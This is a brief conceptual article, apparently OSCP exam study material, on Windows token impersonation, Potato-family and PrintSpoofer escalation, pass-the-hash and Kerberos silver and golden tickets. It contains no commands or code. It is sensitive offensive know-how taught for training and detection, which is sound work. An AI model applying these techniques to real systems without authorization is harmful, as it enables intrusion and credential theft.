Token Manipulation and Impersonation

2 min read Security Careers & Certifications

Token Manipulation and Impersonation

Windows access tokens govern process privileges and user context, making token manipulation powerful for privilege escalation. Token impersonation allows processes to adopt security contexts of other users. If current processes can impersonate tokens from privileged users, direct privilege escalation becomes possible. Tools like Incognito or built-in Windows APIs enable token manipulation.

SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege enable sophisticated token attacks. Users with these privileges (including IIS and SQL Server service accounts) can impersonate tokens from any process. Techniques like Rotten Potato, Juicy Potato, and PrintSpoofer exploit these privileges for escalation. Understanding Windows authentication internals explains why these seemingly obscure privileges enable complete compromise.

Pass-the-hash attacks leverage NTLM authentication to move laterally without cleartext passwords. Extracting password hashes from memory or SAM databases enables authentication as compromised users. While primarily lateral movement techniques, pass-the-hash from administrative accounts provides privilege escalation on additional systems. Tools like Mimikatz, while restricted in OSCP, demonstrate these concepts.

Kerberos ticket manipulation provides stealthier authentication than NTLM-based attacks. Silver tickets forge service authentication, while golden tickets provide domain-wide access. Understanding Kerberos fundamentals enables both exploitation and detection of these attacks. While advanced for OSCP, exposure to Kerberos concepts prepares for modern Active Directory assessments.